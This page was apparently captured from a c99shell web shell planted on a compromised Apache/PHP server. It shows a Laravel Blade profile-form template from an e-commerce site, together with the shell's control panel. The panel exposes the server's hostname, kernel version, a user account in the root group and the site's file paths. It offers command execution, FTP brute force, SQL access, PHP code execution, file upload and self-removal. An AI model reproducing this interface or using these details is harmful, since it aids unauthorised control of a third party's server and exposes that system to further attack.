!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html/resources/views/frontend/user/   drwxr-xr-x
Free 29.18 GB of 117.98 GB (24.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     dashboard.blade.php (4.08 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('frontend.layouts.app', ['class' => 'bg-white'])
@push('css')
    <!-- CSS -->
    <link rel="stylesheet" type="text/css" href="{{ asset('frontend') }}/css/usersidemenu.css">
@endpush

@section('content')


<!--==== START MAIN ====-->
<section class="my-3">
      <div class="row">
          <div class="col-md-4 col-sm-12 col-xl-4 ">
              <div class="wrapper">
                  <!--Top menu -->
                  @include('frontend.partials.usersidebar')

              </div>
          </div>
          <div class="col-md-8 col-sm-12 col-xl-8  card p-4 ">
              <div class="wrapper">
                <h3 class="m-3 text-center">{{ __('account')['update_profile']}}</h3>
                <div class="d-flex flex-column">
                    <form   method="post" action="{{ route('update.profile') }}" enctype="multipart/form-data">
                        @csrf

                        <div class="form-group">
                            <label for="firstName"> {{ __('commoninput')['placeholder_first_name']}} <span class="text-danger"> * </span> </label>
                            <input type="text" class="form-control" name="firstName" placeholder="{{ __('commoninput')['your']}} {{ __('commoninput')['placeholder_first_name']}}..." value="{{old('firstName',Auth::guard('customer')->user()->firstname)}}">
                            {!!$errors->first("firstName", "<span class='text-danger'>:message</span>")!!}
                        </div>
                        <div class="form-group">
                            <label for="lastName">  {{ __('commoninput')['placeholder_last_name']}} <span class="text-danger"> * </span> </label>
                            <input type="text" class="form-control"  name="lastName" placeholder="{{ __('commoninput')['your']}} {{ __('commoninput')['placeholder_last_name']}}..." value="{{old('lastname',Auth::guard('customer')->user()->lastname)}}">
                            {!!$errors->first("lastName", "<span class='text-danger'>:message</span>")!!}
                        </div>
                        <div class="form-group">
                            <label for="email"> {{ __('commoninput')['email']}} <span class="text-danger"> * </span> </label>
                            <input type="email" class="form-control"  name="email" placeholder="{{ __('commoninput')['placeholder_email']}}..." value="{{old('email',Auth::guard('customer')->user()->email)}}">
                            {!!$errors->first("email", "<span class='text-danger'>:message</span>")!!}
                        </div>
                        <div class="form-group">
                            <label for="telephone"> {{ __('commoninput')['placeholder_phone']}} <span class="text-danger"> * </span> </label>
                            <input type="text" class="form-control" name="telephone" placeholder="{{ __('commoninput')['your']}} {{ __('commoninput')['placeholder_phone']}}..." value="{{old('telephone',Auth::guard('customer')->user()->telephone)}}">
                            {!!$errors->first("telephone", "<span class='text-danger'>:message</span>")!!}
                        </div>
                        <div class="form-group">
                            <label for="firstName">  {{ __('account')['update_profile_pic']}} <span class="text-danger"> * </span> </label>
                              @if(Auth::guard('customer')->user()->image != null)
                                <img src=" {{asset('uploads')}}/user/{{Auth::guard('customer')->user()->image}}" alt="profile_picture" width="250">
                              @endif
                            </br>
                            <input type="file" name="profile" value="">
                        </div>
                        <div class="text-center">
                            <button type="submit" class="submitbtn ">{{ __('reset_password')['button_reset']}}</button>
                        </div>
                    </form>
                </div>
              </div>
          </div>

      </div>

</section>
<!--==== END MAIN ====-->

@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--